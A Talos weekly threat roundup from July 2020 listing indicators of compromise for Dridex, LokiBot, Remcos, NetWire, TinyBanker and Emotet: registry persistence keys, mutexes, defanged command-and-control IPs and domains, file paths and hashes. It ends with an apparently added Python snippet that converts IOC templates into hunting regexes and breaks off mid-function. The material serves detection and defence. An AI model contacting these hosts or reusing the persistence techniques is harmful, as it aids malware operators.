Friday, July 17, 2020

Threat Roundup for July 10 to July 17


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 10 and July 17. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:
Threat Name | Type | Description
Win.Packed.Dridex-8827837-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.LokiBot-8698229-0 | Trojan | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from many popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Trojan.Remcos-8699084-0 | Trojan | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.NetWire-8705629-0 | Packed | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Keylogger.TinyBanker-8791735-1 | Keylogger | TinyBanker, also known as Zusy or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Trojan.Emotet-8831420-0 | Trojan | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.

Threat Breakdown

Win.Packed.Dridex-8827837-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: trkcore) 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM (Value Name: DisableTaskMgr) 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 (Value Name: CheckSetting) 25
<HKCR>\LOCAL SETTINGS\MUICACHE\66\52C64B7E (Value Name: LanguageList) 25
Mutexes | Occurrences
\Sessions\1\BaseNamedObjects\X8mdYHOY8b 1
\Sessions\1\BaseNamedObjects\Ut8mrtIyK8 1
\Sessions\1\BaseNamedObjects\xV8DaYJqBh 1
\Sessions\1\BaseNamedObjects\zM4pAveIzF 1
\Sessions\1\BaseNamedObjects\dvthfjjeSq 1
\Sessions\1\BaseNamedObjects\TxV53LW0fw 1
\Sessions\1\BaseNamedObjects\kjYzS3FBf0 1
\Sessions\1\BaseNamedObjects\Gd2lM282If 1
\Sessions\1\BaseNamedObjects\8cJJF971pF 1
\Sessions\1\BaseNamedObjects\0ZLQGKPrsk 1
\Sessions\1\BaseNamedObjects\exgJlYXto0 1
\Sessions\1\BaseNamedObjects\3drb6W0qjO 1
\Sessions\1\BaseNamedObjects\cufo5v6r1B 1
\Sessions\1\BaseNamedObjects\I6OelmgKcp 1
\Sessions\1\BaseNamedObjects\OQn0ntm6vj 1
\Sessions\1\BaseNamedObjects\EDaX68iPDI 1
\Sessions\1\BaseNamedObjects\GCUbcoRHVR 1
\Sessions\1\BaseNamedObjects\TOo3cHsdFZ 1
\Sessions\1\BaseNamedObjects\AoIzaTR9Zb 1
\Sessions\1\BaseNamedObjects\Nulp0B5VU1 1
\Sessions\1\BaseNamedObjects\GUrvcftYUJ 1
\Sessions\1\BaseNamedObjects\UPzFb8J7iX 1
\Sessions\1\BaseNamedObjects\zlhFVM2krx 1
\Sessions\1\BaseNamedObjects\GheSQMXCsH 1
\Sessions\1\BaseNamedObjects\JbhjpD4jlS 1
*See JSON for more IOCs
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
104[.]23[.]99[.]190 13
104[.]23[.]98[.]190 12
172[.]217[.]197[.]100/31 9
205[.]185[.]216[.]10 7
72[.]21[.]81[.]240 5
205[.]185[.]216[.]42 4
172[.]217[.]197[.]138/31 4
172[.]217[.]197[.]113 2
204[.]79[.]197[.]200 1
172[.]217[.]197[.]102 1
172[.]217[.]13[.]78 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
pastebin[.]com 25
ctldl[.]windowsupdate[.]com 16
cds[.]d2s7q6s2[.]hwcdn[.]net 11
cs11[.]wpc[.]v0cdn[.]net 5
www[.]bhvcnilnxq[.]com 1
www[.]ca7ax5kdsp[.]com 1
www[.]yz0oyqdi0g[.]com 1
www[.]gofuuc5wmb[.]com 1
www[.]kyt7yhrfyc[.]com 1
www[.]z9htvoigia[.]com 1
www[.]uc3nhnajyx[.]com 1
www[.]di7cln2izr[.]com 1
www[.]ynqawy0n05[.]com 1
www[.]c6zyoxlpfh[.]com 1
www[.]4vyhny93ku[.]com 1
www[.]b5m6f5a21q[.]com 1
www[.]mvv8gvuiy1[.]com 1
www[.]owvvajedxy[.]com 1
www[.]uoetm1pdeg[.]com 1
www[.]cvglpli1qz[.]com 1
www[.]ebiufgdzos[.]com 1
www[.]wm3qfbhlv0[.]com 1
www[.]rcjldxckwn[.]com 1
www[.]mrwqnhk8zc[.]com 1
www[.]7ayyovgtmw[.]com 1
*See JSON for more IOCs
Files and/or directories created | Occurrences
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 16
<malware cwd>\old_<malware exe name> (copy) 16
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 2

File Hashes

0a458f25b16b546f0931f7cecffb1181caed311660c175c8c8d34c871007a62b 0b4b945ae60f52616f2cc1d873af5d2a02cb83d787d3d131c6171ac4c62e1124 2517cb61f9a99c4010ec511568169515734ebd10deb189384fcec666728c050e 2971cdf6b7fb81a37052acdc0d4de87ae2fd462f39a8f4c1c7043f9f4e28ef29 2e9721add69ef3e6eb8dcb0a6502a1d8e59330393244263b109eac301b6cb88a 3590c5ed9b5c8a95713240b3b6a8b3110f605523da2e548d1c5ab043ab1d44b8 3e567c7102100cd377db7108f81979a439a903821da1cfd7bbd9be012a1de783 430e8d5555257b9794340d38819f1284231a5c3582a0041db420d950be7876ed 432f369c0c95be349a3ba5b394f612fdfbd2fa1ac9e14c0528e7c38e8fd1150a 610cff87cd900ca26f09a7ffa2ca70356c0d902ace7a9e05a01628ed083d01d5 61eebfa1538d1720a32b9a3a30f70313b480465a05d7f930563ac3d6b5514f1b 77aec805bed94f2693ce7802df374e1d5ce2f56d46174ab9cfe167bc0faf3a74 7886a0740a021f1393dc4f154fcac8fccc118c9e25c16b266012c8538cd94359 7cb1043cef6fe87bd14803e9676190124878d2d040f996ebe58cc6d8f299ba97 860f6587300d97e47de60f87a6974f9da7dfeb5e813b9780bfb621cbc9a0e530 9f1b795d0723f78350ba11e390114dbd6cba2e59f25a4c5d3e684c7b0d508a3b a446e1d11f89bc5610d9ca9b6bcd1faa91f3635c44a548c5ad80c88a401a1442 ac78ec2ebd63237012252d7355416cd3847ac0d03f3942057e2ba0d17d641ca7 af427e783d5fd2c3b292b29f2aa6e2cda13d23dd92a67a7d963a248afd555d00 b0065ebb81e62013d8a02113003775edb061807589a908d199d0c091581c9487 b3092894e72004368dfe1dde9c9f213cabd25fe683b70eb7e24ff0093094a343 b8d40c04b216547bc7d84f094f9cd7ad15b193a24b7f0e2f861caf1716079420 babde11121df3f032d3b6c3b6ade8a9363b25f9bc8dd88ca4b31af80620fc185 bae259e9bc04f7efada21102f63fc8df0db0761f74fd5069a04ac30357c61fa6 bf890d27babe1698002618e8027b5c682a828ce8e3e7093f140eb32ce480449a
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: AMP, ThreatGrid (images omitted). MITRE ATT&CK technique map (image omitted).




Win.Trojan.LokiBot-8698229-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 48 samples
Mutexes | Occurrences
3749282D282E1E80C56CAE5A 44
3BA87BBD1CC40F3583D46680 27
Global\399bab01-b9c0-11ea-a007-00501e3ae7b5 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
50[.]31[.]174[.]86 44
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
wardia[.]com[.]pe 44
Files and/or directories created | Occurrences
%APPDATA%\D282E1 44
%APPDATA%\D282E1\1E80C5.lck 44
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 44
%APPDATA%\D1CC40\0F3583.hdb 27
%APPDATA%\D1CC40\0F3583.lck 27
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1258710499-2222286471-4214075941-500\a18ca4003deb042bbee7a40f15e1970b_8f793a96-da80-4751-83f9-b23d8b735fb1 27

File Hashes

02405e5b4e6e088d62745e8dfd4b5b4b9491b3db7fb1015e58b97540faf83a12 05b528653d1e8ccb41ad0c548c241eecac3975dff75b52265fee43e1a3c73702 06166ad95fb7e93e9188bfce187973d9119de33b9f4dbd14d6ccb1d944bbd3ce 08595b0bb686e62691ba5ea7493d7910dce9d49b91083f4ca56c032056ab1fb0 0986f1341bdb2a5addd83cdc9e166538e01c5b0452a5906e86d5885ee138939e 17ea37b291a0e7c18627f1b1776225fae81bf0d9ef903c66573b9133f8322d92 1bc766900cfba5f94c6f1733615d96a8834b5ca34d79f45e120342185445c8cb 29a018b12ea30cf94dcab8b5c051440edc99dd53fec1e77c4defcc6a6be2818e 2a9af6d9215c0783552a3eabaca2b0d982539d4c02fe28a2f5f7be3e7f8a9166 30600ee5509e5ba51684ae971b4bf271387ba080f229c92af85c585470748672 3545641198203804c69e11c51863818789c56ae73035e133df5564c3b54efb0e 38121326a2c7ee77a3f07f527401011918ab496c3bb7b54b1fbeb13d55b78d3e 3d742d794b637d0a9117dd81f2f42f8376387faefe84566b5eaf6200bba999e4 4bc88ed49a1a6e9687bd7e6029aa342df798a9df7aaae8fd55216412123bf6ce 5008af9d951ddc879c098dffbfc9af85b6f96ce32272485f0346fefa3b493768 556ccb1f58e3fcb0e21a33126d4b0c9db301a67ef73707bfe01e6e8617b98c31 583683deb9f5b36e4727455fc30e6ad6c67691f96c2cfd205a3ddb690e579a4d 5b80f62dbee57c236b952eabd918eed83182870d4a413fe135f578ea905446b5 5d717bd1c7a0382de9e17aa60ac47338ee9ff3386f0cd71a98d1e362edb978c2 5d7b52a064d68237714bcf5c1a30c9534f4bc64c8b60305e69086ea2f552cc2e 60e10c08bd4b22471b3fd3f57b573cf9733ffd6743e6a1c3f80f2f55e1fb78af 64161b5861ba3e25658555cebdf0839450498838d61bed11857397be364b3eb5 66184f03bcb915746e01c9db03c9338b817ed48ef3b952afa25e10e9524f7d06 6cb0d058dbfa61e106ac946c6e2458f4c77572551f1c1167fda8ec7163097714 74cc691f958baafe2a83f013d35cc109fc5ef6b1548e2237134ad8e2ca5fb437
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection: AMP, ThreatGrid (images omitted). MITRE ATT&CK technique map (image omitted).




Win.Trojan.Remcos-8699084-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 31 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: remoteaccess) 31
<HKCU>\SOFTWARE\REMOTEACCESS-K0BEK4 31
<HKCU>\SOFTWARE\REMOTEACCESS-K0BEK4 (Value Name: exepath) 31
<HKCU>\SOFTWARE\REMOTEACCESS-K0BEK4 (Value Name: licence) 31
Mutexes | Occurrences
Remcos_Mutex_Inj 31
remoteaccess-K0BEK4 31
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
79[.]134[.]225[.]111 31
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
magiobi[.]myq-see[.]com 31
Files and/or directories created | Occurrences
%TEMP%\install.vbs 31
%APPDATA%\app 31
%APPDATA%\vlc 31
%APPDATA%\app\logs.dat 31
%APPDATA%\vlc\remcos.exe 31

File Hashes

00475692be68c9b147238676446142bf183700deeb8cd32e143353e77ab09a73 0bb8dd1949a99bb002583f1d99dce985bb3e269ff2e233a769cca50fa55a5acc 110d620ca455d7584f798a7799b0a92cf07e3f673cecb0f959125afa3220c394 1950e9f3140894c5fa1bd7d3ebe93a66a36d53fa6d3c1402f3acbdc9bb9dacd4 19581a964e84d02eaddea5b5c7579be4527504e4c56db6f06e627c831bae0e17 1b480b38b483190e7d97c91f40c0fcaa27c0ccd9b30897d026a3b8abccd380bc 1eb8c52f35e953a57e61c06507fb74ec25b33d0265491e064390e6d3410f1b82 1effacfb3cff4e0b46df62b414b87b4ea0b70e9ec4bebfc55ec54bd3dbe5ff89 20800e07fc493ab6d35cc716293a212d6a62a22ef0d56dfbcde5de1b99c1c2c6 20d2a78d773f10bc9d3140bd25fc23e48fce0a2c82ec930698caf5fbf5c05b9e 20ea5776c98d3b978bdb6c1c131ba031840f1cc5f079d9453095ca00c17854b0 20fab6ffe5d240cda3e26437f4bccec2484aa404e66d7f8a255d3e5f6cb014cf 2449ba0a1d2970e93843dfc8b8275895f171dc27de3ab8b2f531c536560a8bd4 25cefc67cc2c8a6b7707a981617d1f64084c7e63736db9dd4e9aae04a2e10efa 25d2c4098787879f8ed49e7578a39ecadd6694d5acb9d02aa44214d2355a88f0 26320027a60323637100fd056f7c4a36da109ee720e7988ba9ef773c500db51f 278300c25364d9b5a1d9b8300eebc8de89c1c263c6d7337fd9617b91f183d02d 2bbfd6807ee7b1aec8c84789403609cf03f6afeed38c8a5f6f8d561eb9131f89 2eb9a53923cb79951c0bbb7cdac72ecae254d75373b59e55280affab1382fb8c 339579a70517724b8f3e4863fbbf5ab5bda9e16861a9b4c4e2b6ce5020c51687 373aac4f9b42c515ac0179869208d0b4e02f3d1fbd45a2a99593b2a5b9264262 398cee4133c816b2b13bbbd5e6c1699a27ebcc1e9077747994dc9908d2b56f0d 3a5c61220e103be08542a1d47f44d79410b0fca2af2a5077376ab7b2bdd430dc 3cbc96f8841fd2fbe9775b639430ff20cdf7bcf9ea3c1dc839867d19bde1585b 3cc44cd55cad45f5596713f80ab45836cf33edf959e59ece400e14445f9a0d09
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: AMP, ThreatGrid (images omitted). MITRE ATT&CK technique map (image omitted).




Win.Packed.NetWire-8705629-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 28 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\NETWIRE 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: officeii365) 25
<HKCU>\SOFTWARE\NETWIRE (Value Name: HostId) 25
<HKCU>\SOFTWARE\NETWIRE (Value Name: Install Date) 25
Mutexes | Occurrences
- 25
Local\MidiMapper_modLongMessage_RefCnt 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
155[.]94[.]198[.]169 25
Files and/or directories created | Occurrences
%APPDATA%\Install 25
%APPDATA%\Install\offiice365.exe 25

File Hashes

036f04fc85c6cc8caca32c566f4a2aee4f4ad4cce00c0a4ebd9112f85368ac85 137a08e7d60b02f3945079b128bdfbdb5f6542a1c40da55e98706611145198bf 16378feb7c715fa61226714f677c483cf7f2f6d76f0ecdf9a5a53f19cb222269 1b931bc1f1aca020b9ace62ff9edfaf9d0c016d96f596e1ab452a4a9c8f73c4d 1e36ad4c1ca3bf21c9bf25e99d8c49e7dcdfa8afb00b5b64b531774ac5f37026 1e4a53218f364bb950b259b7dfd14a470deeb8016202b70e22ed2a62fd1f6338 1f7fbe1b534336f82085dfc4fa6de67db5a480be385ef03e2bd4378073645131 227f4b7cb1b4256ee6b283a781ef9b9b7a763c6328d70e9cf8acfe9e5fae109a 24fccf9369918b06aa514ec3d12709ab4fc21375f1b8b3f995588df5bed8fc28 27805e582560adb6ebe4c394affe9f4c8143b5187d9d77d8b9c0e366d9d5c791 2c9fdc8c5056568797437e12eaf849b38a732d066868294fdccb0935a7406e47 2cfe584b0b15fc716b4b09a916bd44b3a2d25bef612ca7cc5665564f6e67e20e 2dd5fd8f00f9837b33fd06bee57ffa2b66f42a268dda9cec066b499198faadd4 2e5b01f3247577c8faee97771425afaddf9642f5724330922fdcb6499168e8d4 34ad531b5988a986ecd4e84a1333789fe927bfe623c1af30b5eeddcd3a0b929a 3a1c83a8cc8be9cf1bc560b306f1efc05ee968ffc1cd5cc09f03cfc396376d9c 3a745a6f37ca1cdd7008b5c055e1ab1f6c08b4cbe8635f7daee04d6fabaa61ae 3ad06c1c1870e53f1bb229d8f12046e7b6ca2d9de4425d1a4c57b689e7a6995d 3e00e706e14da9d53f8339d604ab82a5e2d4366d1e166218dad4068c9822599f 427d644fef555c6c5133fcd3fa1979d5a0f642a6ec09184292515ff2cdf70f17 42d11a1215979e76c83ac4ef151bbc53344c6fbb039d73e1a40eba3c725da2c9 43e8dd8857d9ddaf07d6d13eb054445d2d195aa84009cbcf33ca962659316fc0 47ff48a7c4608bc0c839f627f30d732df2387bb3a48b12b7be06c7c6f6a07535 4b12e1d2a5f2efaf9bf94c3639191757178998bbd6d40a24fdc7939df872d459 4dfc0cca0d7afe312265579018baaa69c774b8942f19454e37b03bf89b001574
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: AMP (image omitted). MITRE ATT&CK technique map (image omitted).




Win.Keylogger.TinyBanker-8791735-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: FAFEB955) 26
Mutexes | Occurrences
FAFEB955 26
5E60878D 24
Files and/or directories created | Occurrences
%HOMEPATH%\AppData\LocalLow\FAFEB955 26
%APPDATA%\FAFEB955 26
%APPDATA%\FAFEB955\bin.exe 26
%APPDATA%\5E60878D\bin.exe 24

File Hashes

02f714d9530681ca2b5de1651c8e71a29c0bef9fc570a2d54eeb24d8ffcf02be 0ebaddef17527ae1f59121ac7ae05fcb2806fc36fd4ea5e3a8d63999d1ef8245 141731282c5378b959ee12a97d564b58bacae43a50ffbca289a5df8ba8d0771d 14398c45f2dc4d5c6d4c16ba9f276888eee4eb396863a355d059b55795d606e3 15b502a449d911c76cce06cd378d291e8039619a06ace593abbdd2cebe3add27 1be832d22e4a3c920076ff78eeb08e73d0077b04d29b29c2347c5de170b425d4 200a2c5eaa6ce90cc3f825ec4f4f3d8de444282dbd558a9dd0698a9520db2a58 292daa2b85d6423471ab688bf3dcaa91661f9e930ecdf88d9ae8cefdfe8e76fb 36d265d452dd91cfc0640b59f3184112c0e3e20f1c5f1e6409452881458083b5 3c21cb07d0391719918fa40c59ac02b1d0444813bff01aa57ed0173ea17907fe 4015c1917edbb2e1b9db30a3c02f3ae4e8f9ba7015f3c3c0a4274c281e508f7d 40789d2be55ca929fe9e9ebdf084b84a42ec88d166744d06bbda41e24bb98e39 40c0d24f854db3548f0d9ef8fef3cfc7463fae25e690f426e044042e35f46a48 43b909534495841ca1ca6d5a16b4a8ced3c611ae84114d150731c9606cb1b574 47381ffb76fa60172fe273eba6dbb66ac6ebe05c1e6b6a7af863be2b990482c0 4d060e479439e757e3472f81a15da6ae38c7cbf9155c7de9817bf30552088b22 645dafa65eec41b157e7dd205b07df97148105950dea2d0722f02f53f449e2a0 67b202a511ea9de94c1dfd71134539bced5d3b51c0b4020c5585fb4e49334beb 7b4bc90a5a8ebd89b6dd4b804257ec8c0c3b6bc2565a6c6f1e24f77f4b33fca5 8cf7d553e27a5c642812bb040f97bc92746d64b9909bddbb38916d36fbeb8c0f 9a21d7ef4b6f50a4e4ce47791bf2231a523884cf58e4d94e2089464967fd6e25 9d76af39b9de6fc9f58ca5d7a83798f37790d2193ff88a71cccad19092009a5c b43794417fec9191f8700df446b20875bb753c9380c70e0c7c6869502fa16282 b47214f748eef3fdd27388c1d59b4a308910d442f78cead2dee6895169ae9e76 b853ec7bf8d69a2ea7203a8881c2671c8e2a546e7a9a299e6062275e52f10cb2
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: AMP, ThreatGrid (images omitted). MITRE ATT&CK technique map (image omitted).




Win.Trojan.Emotet-8831420-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ImagePath) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Description) 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Type) 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Start) 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ErrorControl) 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: DisplayName) 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: WOW64) 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ObjectName) 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER (Value Name: 98b68e3c) 8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSIDENT (Value Name: Description) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT (Value Name: Type) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT (Value Name: Start) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KBD101A (Value Name: ImagePath) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT (Value Name: ErrorControl) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT (Value Name: ImagePath) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT (Value Name: DisplayName) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KBD101A (Value Name: Description) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT (Value Name: WOW64) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT (Value Name: ObjectName) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT (Value Name: Description) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SCRRUN 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SCRRUN (Value Name: Type) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SCRRUN (Value Name: Start) 1
Mutexes | Occurrences
Global\I98B68E3C 8
Global\M98B68E3C 8
Global\Nx534F51BC 3
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
64[.]88[.]202[.]250 16
212[.]51[.]142[.]238 15
91[.]236[.]4[.]234 6
219[.]92[.]13[.]25 6
239[.]255[.]255[.]250 3
51[.]159[.]23[.]217 3
190[.]63[.]7[.]166 2
41[.]169[.]20[.]147 2
177[.]0[.]241[.]28 2
82[.]165[.]15[.]188 2
72[.]10[.]33[.]195 2
190[.]111[.]215[.]4 2
46[.]49[.]124[.]53 2
45[.]118[.]136[.]92 1
Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 7
%SystemRoot%\SysWOW64\msihnd 1
%SystemRoot%\SysWOW64\WinSATAPI 1
%SystemRoot%\SysWOW64\offfilt 1
%SystemRoot%\SysWOW64\msjetoledb40 1
%SystemRoot%\SysWOW64\KBDHEPT 1
%SystemRoot%\SysWOW64\WABSyncProvider 1
%SystemRoot%\SysWOW64\KBDTH0 1
%SystemRoot%\SysWOW64\OpcServices 1
%SystemRoot%\SysWOW64\SensorsCpl 1
%SystemRoot%\SysWOW64\MshtmlDac 1
%SystemRoot%\SysWOW64\wkscli 1
%SystemRoot%\SysWOW64\api-ms-win-crt-math-l1-1-0 1
%SystemRoot%\SysWOW64\ELSCore 1
%SystemRoot%\SysWOW64\api-ms-win-crt-time-l1-1-0 1
%SystemRoot%\SysWOW64\jscript 1
%SystemRoot%\SysWOW64\shell32 1
%SystemRoot%\SysWOW64\WMADMOE 1
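The templated entries in the tables above (the "<random, matching '[A-Z0-9]{8}'>" service names and the "[a-z]{8}" file names under SysWOW64 here, and the "%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp" entry in the Dridex section) and the defanged network indicators throughout this post ("104[.]23[.]99[.]190", "172[.]217[.]197[.]100/31", "magiobi[.]myq-see[.]com") are written for a reader, not a query engine. Turning them into something a hunt can run means refanging the dots, honoring the CIDR suffixes, expanding the hive and environment placeholders, and converting the random-name character classes into anchored regular expressions that stay case-sensitive where the case is part of the indicator. The Python below is an added example and is not Talos code: the placeholder expansions follow Sysmon's conventions (HKCU keys logged under the user's SID in HKU, per-user paths under C:\Users\<name>) and are assumptions, the event records are constructed, and only a handful of the post's indicators are included. As the tables say, a hit on a network indicator is a lead to triage, not a verdict; the behavioral templates are the stronger signal.

```python
import ipaddress
import re

# Indicators as printed in the post: (family, indicator); the /31 keeps its suffix.
NETWORK_IOCS = [
    ("Dridex", "104[.]23[.]99[.]190"),
    ("Dridex", "172[.]217[.]197[.]100/31"),
    ("Remcos", "magiobi[.]myq-see[.]com"),
    ("LokiBot", "wardia[.]com[.]pe"),
]
# (family, event kind, path template, value name or None), also as printed.
HOST_IOCS = [
    ("Emotet", "registry",
     r"<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>", "ImagePath"),
    ("Emotet", "file", r"%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>", None),
    ("Dridex", "file", r"%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp", None),
    ("Remcos", "registry", r"<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", "remoteaccess"),
]
# Assumed placeholder expansions (regex fragments) in Sysmon's notation: HKCU keys
# are logged under the user's SID in HKU, per-user paths live under C:\Users\<name>.
PLACEHOLDERS = {
    "<HKLM>": r"HKLM",
    "<HKCU>": r"HKU\\S-1-5-21-[0-9-]+",
    "%SystemRoot%": r"C:\\Windows",
    "%TEMP%": r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp",
    "%APPDATA%": r"C:\\Users\\[^\\]+\\AppData\\Roaming",
}
TOKEN = re.compile(r"<random, matching '([^']*)'>|(<HK[A-Z]+>|%[A-Za-z]+%)")


def _ci(fragment):
    """Make a regex fragment case-insensitive (Windows paths and keys are)."""
    return "(?i:%s)" % fragment if fragment else ""


def template_to_regex(template):
    """Anchored regex for a post-style template. Literal text and placeholders match
    case-insensitively; the "<random, matching ...>" classes are used verbatim and stay
    case-sensitive, because the case is part of the indicator (Emotet's service names
    are upper-case alphanumerics, its SysWOW64 file names lower-case letters)."""
    parts, pos = [], 0
    for m in TOKEN.finditer(template):
        parts.append(_ci(re.escape(template[pos:m.start()])))
        random_class, placeholder = m.groups()
        if random_class is not None:
            parts.append(random_class)
        else:  # unknown placeholders are kept literally
            parts.append(_ci(PLACEHOLDERS.get(placeholder, re.escape(placeholder))))
        pos = m.end()
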